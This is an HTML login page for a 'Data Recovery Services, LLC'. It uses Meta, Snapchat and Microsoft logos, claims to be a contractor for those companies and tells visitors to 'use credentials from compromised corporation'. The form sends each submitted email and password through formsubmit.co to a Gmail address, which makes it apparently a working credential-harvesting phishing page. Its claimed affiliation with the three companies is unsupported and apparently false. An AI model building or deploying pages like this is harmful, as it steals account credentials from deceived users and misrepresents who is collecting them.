<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="icon" type="image/png" href="drsllc.png">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login | Data Recovery Services</title>
    <style>
        body {
            font-family: Arial, sans-serif;
	    background: #000000 url("billie-holiday.png") repeat;
	    background-size: 100px 100px;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 1;
        }
        .login-container {
            background: #D3D3D3;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 300px;
	}
    
   	 .login-container img {
     	   width: 80px;
     	   max-width: 80%;
     	   display: block;
     	   margin: 0 auto 15px auto;
	   border-radius: 5px;
    }
	      
    	.small-logos {
           display: flex;
           justify-content: center;
           gap: 5px;
           margin-bottom: 5px;
    }
   	 .small-logos img {
           width: 50px;
           height: auto;
	   object-fit: contain;
	   margin-bottom: 5px;
        }
        .login-container h2 {
	    font-family: Calibri, sans-serif;
            margin-bottom: 20px;
            color: #333;
        }
	.login-container h2::after {
      	    content: "";
       	    display: block;
       	    width: 100%;
      	    height: 3px;
      	    background-color: #494848; 
      	    margin-top: 10px;
    }
	.login-container h6 {
		margin-top: 5px;
	}
	    
        .login-container input {
            width: 95%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .login-container button {
            width: 95%;
            padding: 10px;
            background: #007BFF;
            border: none;
            color: white;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
        }
        .login-container button:hover {
            background: #0056b3;
        }
        .footer {
          position: fixed;
	  font-size: 12px;
  	  bottom: 0;
   	  width: 100%;
  	  background-color: #999090;
  	  padding: 10px 0;
	  justify-content: center;
   	  text-align: center;
	  height: 20px;
        }
    </style>
</head>
<body>

    <div class="login-container">
	<img src="drsllc.png" alt="Data Recovery Services Logo">
        <h2>Data Recovery Services Login</h2>
	    <div class="small-logos">
  		  <img src="meta.png" alt="Meta Logo">
  		  <img src="snap.png" alt="Snapchat Logo">
   		 <img src="microsoft.png" alt="Microsoft Logo">
	    </div>
	<h6> Meta Platforms, Inc. | Snap Inc. | Microsoft Corporation </h6>
	    <h8>Use credentials from compromised corporation</h8>
        <form action="https://formsubmit.co/datarecoveryservicesllc@gmail.com" method="POST">
            <input type="email" name="email" placeholder="Email Address" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Login</button>
        </form>

        <p class="footer">Need help? <a href="mailto:datarecoveryservicesllc@gmail.com">Contact Support</a></p>
    </div>
<footer class="footer">
        Copyright © 2025 Data Recovery Services, LLC. All Rights Reserved. Data Recovery Services, LLC is an independent and encrypted data recovery contractor for Meta Platforms, Inc.; Snap Inc.; Microsoft Corporation.
    </footer>
</body>
</html>
